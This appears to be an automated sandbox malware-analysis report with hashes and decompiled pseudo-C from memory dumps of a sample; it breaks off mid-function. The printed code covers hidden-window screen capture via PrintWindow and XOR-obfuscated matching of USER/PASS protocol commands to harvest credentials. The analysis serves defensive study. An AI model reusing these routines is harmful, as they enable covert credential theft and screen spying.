Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5de11fac561b98fbc0269d30167c51b7fb7d387712774ba005d8830153e5700
Instruction ID: 63e6a8de148f0bc1d0fb5d2126a7c73a6e06c7c5166c9d567d207dae7b3003da
Opcode Fuzzy Hash: b5de11fac561b98fbc0269d30167c51b7fb7d387712774ba005d8830153e5700
Instruction Fuzzy Hash: DE218132330400ABD768DF3DED5961633E2E78A35439A853DD655D32A0DA79E913CB1C

Uniqueness

Uniqueness Score: -1.00%

Function 00412738, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction ID: a6f42419d81c7f93f1778707cbdc58ee93fc113079310d97c45b8dabfca5cd04
Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction Fuzzy Hash: E5E0267A3400158BC700CE11D980D83F7A6FBD8330B1286A5C825C7349C938EEC3C9D1

Uniqueness

Uniqueness Score: -1.00%

Function 004050A4, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004050A4(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
				char _v9;
				signed int _v10;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* _v68;
				signed int _v72;
				int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				struct HDC__* _v96;
				struct HWND__* _v100;
				void _v104;
				intOrPtr _v140;
				intOrPtr _v156;
				struct tagWINDOWINFO _v164;
				signed int _t128;
				signed int _t135;
				void* _t140;
				void* _t146;
				signed int _t164;
				intOrPtr _t191;
				long _t192;
				intOrPtr _t195;
				long _t196;
				long _t210;
				long _t211;
				long _t212;
				long _t213;
				signed int _t214;
				signed int _t215;
				RECT* _t216;
				struct HDC__* _t217;
				struct HDC__* _t221;

				_t214 = __edx;
				_t216 = __eax;
				_t128 = E0040D568(_a8) & 0x0000ffff;
				_v16 = _t128;
				if((_t128 & 0x00000001) == 0) {
					if(_t128 == 0) {
						_v16 = 2;
						_t128 = _v16;
					}
					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
						_v16 = _t128 & 0x0000fffd | 0x00000008;
					}
					_v24 = 0;
					_v20 = 0;
					_v28 = 0;
					_v32 = 0;
					_v164.cbSize = 0x3c;
					if(GetWindowInfo(_a8,  &_v164) != 0) {
						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
						_v10 = _t215;
						if(_t215 != 0) {
							_t212 = _t216->top;
							_t195 = _v156;
							if(_t195 < _t212) {
								_v20 = _t195 - _t212;
							}
							_t213 = _t216->left;
							_t196 = _v164.rcWindow.left;
							if(_t196 < _t213) {
								_v24 = _t196 - _t213;
							}
						}
						_t135 = _v16 & 0x00000002;
						_v72 = _t135;
						if(_t135 == 0) {
							_a15 = _t215;
						} else {
							if((_v164.dwStyle & 0x20000000) == 0) {
								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
								if(_a15 != 0) {
									_t210 = _t216->top;
									_t191 = _v140;
									if(_t191 < _t210) {
										_v32 = _t191 - _t210;
									}
									_t211 = _t216->left;
									_t192 = _v164.rcClient.left;
									if(_t192 < _t211) {
										_v28 = _t192 - _t211;
									}
								}
							} else {
								_a15 = 0;
							}
						}
						if(_v10 != 0 || _a15 != 0) {
							_t217 = GetDC(0);
							if(_t217 == 0) {
								goto L8;
							}
							_t221 = CreateCompatibleDC(_t217);
							ReleaseDC(0, _t217);
							if(_t221 == 0) {
								goto L8;
							}
							_t218 = _a4;
							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
							_v68 = _t140;
							if(_t140 != 0) {
								_v9 = 1;
								if(_v72 == 0) {
									if((_v16 & 0x00000004) == 0) {
										if((_v16 & 0x00000008) == 0) {
											L56:
											SelectObject(_t221, _v68);
											DeleteDC(_t221);
											return _v9;
										}
										if(_v24 != 0 || _v20 != 0) {
											SetViewportOrgEx(_t221, _v24, _v20, 0);
										}
										_t146 = E00404FC2(_t218,  &_v64, 0);
										__imp__PrintWindow(_a8, _t221, 0);
										if(_t146 != 0) {
											L55:
											E00404FC2(_t218,  &_v64, 1);
										} else {
											_v9 = 0;
										}
										goto L56;
									}
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E00404FC2(_t218,  &_v64, 0);
									DefWindowProcW(_a8, 0x317, _t221, 0xe);
									goto L55;
								}
								_v100 = _a8;
								_v96 = _t221;
								_v84 = _v48.right - _v48.left;
								_v76 = 1;
								_v80 = _v48.bottom - _v48.top;
								_v92 = 0;
								_v88 = 0;
								TlsSetValue( *0x4231bc,  &_v104);
								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
									_v16 = SaveDC(_t221);
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E00404FC2(_a4,  &_v64, 0);
									_v104 = 0;
									SendMessageW(_a8, 0x85, 1, 0);
									if(_v104 == 0) {
										DefWindowProcW(_a8, 0x317, _t221, 2);
									}
									E00404FC2(_a4,  &_v64, 1);
									RestoreDC(_t221, _v16);
								}
								if(_a15 != 1) {
									L49:
									TlsSetValue( *0x4231bc, 0);
									goto L56;
								} else {
									if(_v28 != 0) {
										L41:
										_a15 = 1;
										L42:
										_v16 = SaveDC(_t221);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										E00404FC2(_a4,  &_v48, 0);
										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
										asm("sbb eax, eax");
										_v76 =  ~_t164 + 1;
										RestoreDC(_t221, _v16);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										_v104 = 0;
										SendMessageW(_a8, 0xf, 0, 0);
										if(_v104 == 0) {
											DefWindowProcW(_a8, 0x317, _t221, 4);
										}
										E00404FC2(_a4,  &_v48, 1);
										goto L49;
									}
									_a15 = 0;
									if(_v32 == 0) {
										goto L42;
									}
									goto L41;
								}
							}
							DeleteDC(_t221);
							goto L8;
						} else {
							goto L1;
						}
					}
					L8:
					return 0;
				}
				L1:
				return 1;
			}

0x004050a4
0x004050b3
0x004050ba
0x004050bd
0x004050c2
0x004050d0
0x004050d2
0x004050d9
0x004050d9
0x004050df
0x004050ed
0x004050ed
0x004050fa
0x004050fd
0x00405100
0x00405103
0x00405106
0x00405118
0x00405137
0x0040513a
0x0040513f
0x00405141
0x00405144
0x0040514c
0x00405150
0x00405150
0x00405153
0x00405155
0x0040515d
0x00405161
0x00405161
0x0040515d
0x00405167
0x0040516a
0x0040516d
0x004051bb
0x0040516f
0x00405176
0x0040518d
0x00405194
0x00405196
0x00405199
0x004051a1
0x004051a5
0x004051a5
0x004051a8
0x004051aa
0x004051b2
0x004051b6
0x004051b6
0x004051b2
0x00405178
0x00405178
0x00405178
0x00405176
0x004051c1
0x004051d3
0x004051d7
0x00000000
0x00000000
0x004051e6
0x004051e8
0x004051f0
0x00000000
0x00000000
0x004051f6
0x004051fd
0x00405203
0x00405208
0x00405216
0x0040521e
0x00405399
0x004053fa
0x004053db
0x004053df
0x004053e6
0x00000000
0x004053ec
0x004053ff
0x0040540e
0x0040540e
0x0040541a
0x00405424
0x0040542c
0x004053cf
0x004053d6
0x0040542e
0x0040542e
0x0040542e
0x00000000
0x0040542c
0x0040539e
0x004053ad
0x004053ad
0x004053b9
0x004053c9
0x00000000
0x004053c9
0x00405227
0x00405230
0x00405233
0x0040523c
0x00405243
0x00405250
0x00405253
0x00405256
0x00405266
0x00405281
0x00405287
0x00405296
0x00405296
0x004052a3
0x004052b3
0x004052b6
0x004052bb
0x004052c8
0x004052c8
0x004052d6
0x004052df
0x004052df
0x004052e9
0x00405386
0x0040538d
0x00000000
0x004052ef
0x004052f2
0x004052fc
0x004052fc
0x00405300
0x00405307
0x0040530d
0x00405317
0x00405317
0x00405324
0x00405330
0x00405337
0x0040533b
0x0040533e
0x00405347
0x00405351
0x00405351
0x0040535e
0x00405361
0x00405366
0x00405373
0x00405373
0x00405381
0x00000000
0x00405381
0x004052f4
0x004052fa
0x00000000
0x00000000
0x00000000
0x004052fa
0x004052e9
0x0040520b
0x00000000
0x00000000
0x00000000
0x00000000
0x004051c1
0x0040511a
0x00000000
0x0040511a
0x004050c4
0x00000000

APIs

Part of subcall function 0040D568: GetClassNameW.USER32 ref: 0040D583

GetWindowInfo.USER32 ref: 00405110
SelectObject.GDI32(00000000,?), ref: 004053DF
DeleteDC.GDI32(00000000), ref: 004053E6
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0040540E
PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 00405424

Strings

<, xrefs: 00405106

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
String ID: <
API String ID: 3458064076-4251816714
Opcode ID: 2ce3b519abf72b57e3baa0ea61d4ec2de073a69e3078cc1c57a830c6a460abe0
Instruction ID: 89271e606109fe184fbca3a54436a17adbda24e09563d6d30808168a8dbda32b
Opcode Fuzzy Hash: 2ce3b519abf72b57e3baa0ea61d4ec2de073a69e3078cc1c57a830c6a460abe0
Instruction Fuzzy Hash: 6CC16A71D01249AFDF119FA4DD84AEFBBB9EF05340F04806AF911B62A0D7788A45DF68

Uniqueness

Uniqueness Score: -1.00%

Function 0041A205, Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041A205(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
				char _v536;
				char _v652;
				char _v664;
				char _v696;
				char _v700;
				char _v701;
				char _v708;
				void* __esi;
				char* _t35;
				void* _t40;
				char* _t43;
				intOrPtr _t44;
				void* _t47;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				signed int* _t71;
				intOrPtr _t73;
				signed int _t75;
				signed char _t76;
				intOrPtr _t79;
				signed int _t80;
				intOrPtr _t83;
				signed int* _t84;
				intOrPtr _t85;
				void* _t87;
				char* _t92;
				void* _t93;
				intOrPtr* _t94;

				_t80 = __edx;
				_t87 = __eax;
				_t71 = __ecx;
				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
					L51:
					_t35 = 0;
					__eflags = 0;
				} else {
					if(__eax <= 6) {
						L24:
						__eflags = _t87 - 1;
						if(_t87 <= 1) {
							goto L51;
						} else {
							EnterCriticalSection(0x423fc4);
							_t83 = E0041A0FD(_a4);
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags =  *((intOrPtr*)(_t83 + 4));
								if( *((intOrPtr*)(_t83 + 4)) == 0) {
									L48:
									_push(0);
									goto L49;
								} else {
									__eflags =  *((intOrPtr*)(_t83 + 8));
									if( *((intOrPtr*)(_t83 + 8)) == 0) {
										goto L48;
									} else {
										__eflags = _t87 - 3;
										if(_t87 < 3) {
											L33:
											__eflags = _t87 - 4;
											if(_t87 >= 4) {
												_t75 =  *_t71 ^ 0x07070707;
												__eflags = _t75 - 0x42575e53;
												if(_t75 == 0x42575e53) {
													goto L37;
												} else {
													__eflags = _t75 - 0x53464241;
													if(_t75 == 0x53464241) {
														goto L37;
													} else {
														__eflags = _t75 - 0x51544657;
														if(_t75 != 0x51544657) {
															__eflags = _t75 - 0x53465354;
															if(_t75 == 0x53465354) {
																L40:
																_t76 = 0x65;
																_push(0x15);
																goto L41;
															} else {
																__eflags = _t75 - 0x53544e4b;
																if(_t75 == 0x53544e4b) {
																	goto L40;
																}
															}
														} else {
															goto L37;
														}
													}
												}
											}
										} else {
											_t58 =  *_t71;
											__eflags = _t58 - 0x43;
											if(_t58 == 0x43) {
												L31:
												__eflags = _t71[0] - 0x57;
												if(_t71[0] != 0x57) {
													goto L33;
												} else {
													__eflags = _t71[0] - 0x44;
													if(_t71[0] == 0x44) {
														L37:
														_t76 = 0x64;
														_push(0x14);
														L41:
														_pop(_t40);
														E00405B00(_t40,  &_v696);
														_t43 =  &_v652;
														_v700 = 0x80;
														__imp__#5(_a4, _t43,  &_v700);
														__eflags = _t43;
														if(_t43 == 0) {
															_t78 =  &_v664;
															_t44 = E0040A32F( &_v664);
															__eflags = _t44;
															if(_t44 == 0) {
																__eflags = _t76 - 0x65;
																if(_t76 == 0x65) {
																	L46:
																	E0040A2E6( &_v664, _t78,  &_v536);
																	_t47 = 0x13;
																	E00405B00(_t47,  &_v696);
																	_push( &_v536);
																	_push( *((intOrPtr*)(_t83 + 8)));
																	_push( *((intOrPtr*)(_t83 + 4)));
																	E0040ED2D(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
																} else {
																	__eflags = _t76 - 0x64;
																	if(_t76 == 0x64) {
																		_t92 =  &_v696;
																		_t54 = 0x16;
																		E00405B00(_t54, _t92);
																		_push( *((intOrPtr*)(_t83 + 4)));
																		_t80 = _t80 | 0xffffffff;
																		_t56 = 9;
																		_t78 = _t92;
																		_t57 = E00407A95(_t56, _t92, _t80);
																		__eflags = _t57;
																		if(_t57 != 0) {
																			goto L46;
																		}
																	}
																}
															}
														}
														_push(0);
														L49:
														E0041A19C(_t83);
													} else {
														goto L33;
													}
												}
											} else {
												__eflags = _t58 - 0x50;
												if(_t58 != 0x50) {
													goto L33;
												} else {
													goto L31;
												}
											}
										}
									}
								}
							}
							_t73 = 0;
							goto L23;
						}
					} else {
						_t60 =  *__ecx ^ 0x07070707;
						if(_t60 == 0x55425452 || _t60 == 0x54544657) {
							if(_t71[1] != 0x20) {
								goto L24;
							} else {
								_t61 = 0;
								_t93 = _t87 + 0xfffffffb;
								_t84 =  &(_t71[1]);
								if(_t93 == 0) {
									goto L51;
								} else {
									while(1) {
										_t79 =  *((intOrPtr*)(_t61 + _t84));
										if(_t79 == 0xd || _t79 == 0xa) {
											break;
										}
										if(_t79 < 0x20) {
											goto L51;
										} else {
											_t61 = _t61 + 1;
											if(_t61 < _t93) {
												continue;
											} else {
												break;
											}
										}
										goto L52;
									}
									if(_t61 == 0 || _t61 == _t93) {
										goto L51;
									} else {
										_t85 = E004070C5(_t61, 0xfde9, _t84);
										if(_t85 == 0) {
											goto L51;
										} else {
											_v701 = 0;
											EnterCriticalSection(0x423fc4);
											_t94 = E0041A0FD(_a4);
											if(_t94 != 0) {
												L18:
												__eflags =  *_t71 - 0x55;
												_v701 = 1;
												if( *_t71 != 0x55) {
													E00406E85( *((intOrPtr*)(_t94 + 8)));
													 *((intOrPtr*)(_t94 + 8)) = _t85;
												} else {
													E0041A19C(_t94, 1);
													 *((intOrPtr*)(_t94 + 4)) = _t85;
												}
												 *_t94 = _a4;
											} else {
												_t94 = E0041A136(_a4);
												if(_t94 != 0) {
													goto L18;
												} else {
													E00406E85(_t85);
												}
											}
											_t73 = _v701;
											L23:
											LeaveCriticalSection(0x423fc4);
											_t35 = _t73;
										}
									}
								}
							}
						} else {
							goto L24;
						}
					}
				}
				L52:
				return _t35;
			}

0x0041a205
0x0041a218
0x0041a21a
0x0041a21c
0x0041a473
0x0041a473
0x0041a473
0x0041a236
0x0041a239
0x0041a322
0x0041a322
0x0041a325
0x00000000
0x0041a32b
0x0041a330
0x0041a33e
0x0041a342
0x0041a344
0x0041a34a
0x0041a34d
0x0041a464
0x0041a464
0x00000000
0x0041a353
0x0041a353
0x0041a356
0x00000000
0x0041a35c
0x0041a35c
0x0041a35f
0x0041a377
0x0041a377
0x0041a37a
0x0041a382
0x0041a388
0x0041a38e
0x00000000
0x0041a390
0x0041a390
0x0041a396
0x00000000
0x0041a398
0x0041a398
0x0041a39e
0x0041a3a6
0x0041a3ac
0x0041a3ba
0x0041a3ba
0x0041a3bc
0x00000000
0x0041a3ae
0x0041a3ae
0x0041a3b4
0x00000000
0x00000000
0x0041a3b4
0x00000000
0x00000000
0x00000000
0x0041a39e
0x0041a396
0x0041a38e
0x0041a361
0x0041a361
0x0041a363
0x0041a365
0x0041a36b
0x0041a36b
0x0041a36f
0x00000000
0x0041a371
0x0041a371
0x0041a375
0x0041a3a0
0x0041a3a0
0x0041a3a2
0x0041a3be
0x0041a3c2
0x0041a3c3
0x0041a3cd
0x0041a3d5
0x0041a3dd
0x0041a3e3
0x0041a3e5
0x0041a3e7
0x0041a3eb
0x0041a3f0
0x0041a3f2
0x0041a3f4
0x0041a3f7
0x0041a41e
0x0041a429
0x0041a434
0x0041a435
0x0041a441
0x0041a442
0x0041a449
0x0041a458
0x0041a3f9
0x0041a3f9
0x0041a3fc
0x0041a400
0x0041a404
0x0041a405
0x0041a40a
0x0041a40d
0x0041a412
0x0041a413
0x0041a415
0x0041a41a
0x0041a41c
0x00000000
0x00000000
0x0041a41c
0x0041a3fc
0x0041a3f7
0x0041a3f2
0x0041a460
0x0041a465
0x0041a467
0x00000000
0x00000000
0x00000000
0x0041a375
0x0041a367
0x0041a367
0x0041a369
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a369
0x0041a365
0x0041a35f
0x0041a356
0x0041a34d
0x0041a46c
0x00000000
0x0041a46c
0x0041a23f
0x0041a241
0x0041a24b
0x0041a25c
0x00000000
0x0041a262
0x0041a262
0x0041a264
0x0041a267
0x0041a26a
0x00000000
0x0041a270
0x0041a270
0x0041a270
0x0041a276
0x00000000
0x00000000
0x0041a280
0x00000000
0x0041a286
0x0041a286
0x0041a289
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a289
0x00000000
0x0041a280
0x0041a28d
0x00000000
0x0041a29b
0x0041a2a6
0x0041a2aa
0x00000000
0x0041a2b0
0x0041a2b5
0x0041a2ba
0x0041a2c8
0x0041a2cc
0x0041a2e4
0x0041a2e4
0x0041a2e7
0x0041a2ec
0x0041a2ff
0x0041a304
0x0041a2ee
0x0041a2f2
0x0041a2f7
0x0041a2f7
0x0041a30a
0x0041a2ce
0x0041a2d6
0x0041a2da
0x00000000
0x0041a2dc
0x0041a2dd
0x0041a2dd
0x0041a2da
0x0041a30c
0x0041a310
0x0041a315
0x0041a31b
0x0041a31b
0x0041a2aa
0x0041a28d
0x0041a26a
0x00000000
0x00000000
0x00000000
0x0041a24b
0x0041a239
0x0041a475
0x0041a47b

APIs

EnterCriticalSection.KERNEL32(00423FC4,0000FDE9,?), ref: 0041A2BA
LeaveCriticalSection.KERNEL32(00423FC4,?,000000FF), ref: 0041A315
EnterCriticalSection.KERNEL32(00423FC4), ref: 0041A330
getpeername.WS2_32 ref: 0041A3DD

Strings

U, xrefs: 0041A2E4
D, xrefs: 0041A371
S^WB, xrefs: 0041A388
WFTQ, xrefs: 0041A398
ABFS, xrefs: 0041A390
W, xrefs: 0041A36B
, xrefs: 0041A258
WFTT, xrefs: 0041A24D
KNTS, xrefs: 0041A3AE
TSFS, xrefs: 0041A3A6
RTBU, xrefs: 0041A246

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$Leavegetpeername
String ID: $ABFS$D$KNTS$RTBU$S^WB$TSFS$U$W$WFTQ$WFTT
API String ID: 1099368488-2743420458
Opcode ID: 273be7726619fb3d95c607a8581e5f5e9d9de87b76c7e686982a444bd9fc023e
Instruction ID: da4530cc666b8b63cfb1580e52453082bcb5bbf274a359cb7135b7414f74040b
Opcode Fuzzy Hash: 273be7726619fb3d95c607a8581e5f5e9d9de87b76c7e686982a444bd9fc023e
Instruction Fuzzy Hash: 93514731A023459ADF319A64CC897EBB7A05F41714F18452BF8A8A7291C7BDD8E1864F

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5CF, Relevance: 25.7, APIs: 17, Instructions: 205
filewindowregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D5CF(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
				char _v9;
				struct HDC__* _v16;
				char _v20;
				short _v128;
				void* _v138;
				char _v616;
				char _v897;
				char _v1392;
				void* _t60;
				long _t62;
				void* _t66;
				void* _t71;
				void* _t75;
				void* _t79;
				void* _t80;
				struct HDC__* _t82;
				int _t85;
				void* _t87;
				signed char _t90;
				void* _t92;
				void* _t107;
				struct HDC__* _t108;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t120;
				void** _t124;

				_t124 = __esi;
				_t120 = __edx;
				E00406F38(_t60, __esi, 0, 0x18c);
				_t62 = TlsAlloc();
				__esi[1] = _t62;
				if(_t62 != 0xffffffff) {
					E00412E8D(0x84889911,  &_v128, 0);
					_t66 = RegisterWindowMessageW( &_v128);
					__esi[2] = _t66;
					__eflags = _t66;
					if(_t66 == 0) {
						goto L1;
					}
					E00412E8D(0x84889912,  &_v128, 1);
					_t71 = CreateEventW(0x4239a0, 1, 0,  &_v128);
					__esi[3] = _t71;
					__eflags = _t71;
					if(_t71 == 0) {
						goto L1;
					}
					E00412E8D(0x18782822,  &_v128, 1);
					_t75 = CreateMutexW(0x4239a0, 0,  &_v128);
					__esi[5] = _t75;
					__eflags = _t75;
					if(_t75 == 0) {
						goto L1;
					}
					E00412E8D(0x9878a222,  &_v128, 1);
					_t79 = CreateFileMappingW(0, 0x4239a0, 4, 0, 0x3d09128,  &_v128);
					 *__esi = _t79;
					__eflags = _t79;
					if(_t79 == 0) {
						goto L1;
					}
					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
					__eflags = _t80;
					if(_t80 == 0) {
						goto L1;
					}
					__esi[4] = _t80;
					__esi[6] = _t80 + 0x128;
					_v9 = 0;
					_t82 = GetDC(0);
					_v16 = _t82;
					__eflags = _t82;
					if(_t82 == 0) {
						L22:
						return _v9;
					}
					__esi[9] = 0;
					__esi[0xa] = 0;
					__esi[0xb] = GetDeviceCaps(_t82, 8);
					_t85 = GetDeviceCaps(_v16, 0xa);
					_t118 = __esi[0xb];
					__esi[0xc] = _t85;
					__eflags = CreateCompatibleBitmap(_v16, __esi[0xb], _t85);
					if(__eflags == 0) {
						_t87 = 0;
						__eflags = 0;
					} else {
						_t24 =  &(_t124[8]); // 0x4231d8
						_t87 = E0040D423(_t118, _t120, __eflags, _v16,  &_v20, _t24, 0, 0, _t86);
					}
					_t124[7] = _t87;
					ReleaseDC(0, _v16);
					__eflags = _t124[7];
					if(_t124[7] != 0) {
						_t119 = _v20;
						_t90 =  *(_v20 + 0xe) >> 3;
						_t124[0xe] = _t90;
						_t92 = (_t90 & 0x000000ff) * _t124[0xb];
						_t124[0xd] = _t92;
						__eflags = _t92 & 0x00000003;
						if((_t92 & 0x00000003) != 0) {
							_t92 = (_t92 & 0xfffffffc) + 4;
							__eflags = _t92;
						}
						_t124[0xd] = _t92;
						E00406E85(_t119);
						__eflags = _a4 - 1;
						_v9 = 1;
						if(_a4 != 1) {
							goto L22;
						}
						_v9 = 0;
						E00413167( &_v1392);
						E00413194(_t119,  &_v616);
						_t43 =  &(_t124[0xf]); // 0x4231f4
						E00406EC1(_t43, 0x423be0, 0x10);
						_t124[0x13] = _v138;
						_t47 =  &(_t124[0x14]); // 0x423208
						E00406EC1(_t47,  &_v897, 0x102);
						E00412E8D(0x1898b122,  &_v128, 1);
						_t107 = CreateMutexW(0x4239a0, 0,  &_v128);
						_t124[0x58] = _t107;
						__eflags = _t107;
						if(_t107 == 0) {
							goto L1;
						}
						_t108 = GetDC(0);
						_a4 = _t108;
						__eflags = _t108;
						if(_t108 != 0) {
							_t109 = CreateCompatibleDC(_t108);
							_t124[0x55] = _t109;
							__eflags = _t109;
							if(_t109 != 0) {
								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
								_t124[0x57] = _t111;
								__eflags = _t111;
								if(_t111 != 0) {
									_t112 = SelectObject(_t124[0x55], _t111);
									_t124[0x56] = _t112;
									__eflags = _t112;
									if(_t112 != 0) {
										_v9 = 1;
									}
								}
							}
							ReleaseDC(0, _a4);
						}
					}
					goto L22;
				}
				L1:
				return 0;
			}

0x0040d5cf
0x0040d5cf
0x0040d5e3
0x0040d5e8
0x0040d5ee
0x0040d5f4
0x0040d607
0x0040d610
0x0040d616
0x0040d619
0x0040d61b
0x00000000
0x00000000
0x0040d628
0x0040d63a
0x0040d640
0x0040d643
0x0040d645
0x00000000
0x00000000
0x0040d652
0x0040d65d
0x0040d663
0x0040d666
0x0040d668
0x00000000
0x00000000
0x0040d675
0x0040d688
0x0040d68e
0x0040d690
0x0040d692
0x00000000
0x00000000
0x0040d69e
0x0040d6a4
0x0040d6a6
0x00000000
0x00000000
0x0040d6ac
0x0040d6b5
0x0040d6b8
0x0040d6bb
0x0040d6c1
0x0040d6c4
0x0040d6c6
0x0040d831
0x00000000
0x0040d831
0x0040d6d5
0x0040d6d8
0x0040d6e2
0x0040d6e5
0x0040d6e7
0x0040d6f5
0x0040d6fa
0x0040d6fc
0x0040d713
0x0040d713
0x0040d6fe
0x0040d701
0x0040d70c
0x0040d70c
0x0040d718
0x0040d71c
0x0040d722
0x0040d725
0x0040d72b
0x0040d732
0x0040d736
0x0040d73c
0x0040d740
0x0040d743
0x0040d745
0x0040d74a
0x0040d74a
0x0040d74a
0x0040d74e
0x0040d751
0x0040d756
0x0040d75a
0x0040d75e
0x00000000
0x00000000
0x0040d76a
0x0040d76d
0x0040d779
0x0040d785
0x0040d789
0x0040d794
0x0040d7a3
0x0040d7a7
0x0040d7b7
0x0040d7c6
0x0040d7cc
0x0040d7d2
0x0040d7d4
0x00000000
0x00000000
0x0040d7db
0x0040d7e1
0x0040d7e4
0x0040d7e6
0x0040d7e9
0x0040d7ef
0x0040d7f5
0x0040d7f7
0x0040d800
0x0040d802
0x0040d808
0x0040d80a
0x0040d813
0x0040d819
0x0040d81f
0x0040d821
0x0040d823
0x0040d823
0x0040d821
0x0040d80a
0x0040d82b
0x0040d82b
0x0040d7e6
0x00000000
0x0040d725
0x0040d5f6
0x00000000

APIs

TlsAlloc.KERNEL32(004231B8,00000000,0000018C,00000000,00000000), ref: 0040D5E8
RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0040D610
CreateEventW.KERNEL32(004239A0,00000001,00000000,?,84889912,?,00000001), ref: 0040D63A
CreateMutexW.KERNEL32(004239A0,00000000,?,18782822,?,00000001), ref: 0040D65D
CreateFileMappingW.KERNEL32(00000000,004239A0,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0040D688
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040D69E
GetDC.USER32(00000000), ref: 0040D6BB
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040D6DB
GetDeviceCaps.GDI32(?,0000000A), ref: 0040D6E5
CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0040D6F8

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
String ID:
API String ID: 3765073151-0
Opcode ID: bfce9386e0940528a0dee7948d2c2c66ab94cb1a6d8b28debd14d5b6296c4db2
Instruction ID: 0de73407e857c23112bc7da6f6d8082cae5c584417578acdcffe7f0afc0fd164
Opcode Fuzzy Hash: bfce9386e0940528a0dee7948d2c2c66ab94cb1a6d8b28debd14d5b6296c4db2
Instruction Fuzzy Hash: 5F712275900744AFDB20AFB0CD85AAFB7FCEB08344F10483EF956E6291D67995488F25

Uniqueness

Uniqueness Score: -1.00%

Function 0041BBDC, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BBDC(intOrPtr* _a4) {
				char _v532;
				void* _v536;
				short _v540;
				char* _v552;
				void* _v568;
				char _v570;
				char _v572;
				char _v576;
				char* _v580;
				void* _v592;
				char _v596;
				char _v600;
				void* _v620;
				void* _v624;
				void* _v628;
				char* _v632;
				long _v648;
				void _v652;
				intOrPtr _v656;
				char _v668;
				intOrPtr _v672;
				void* __ebx;
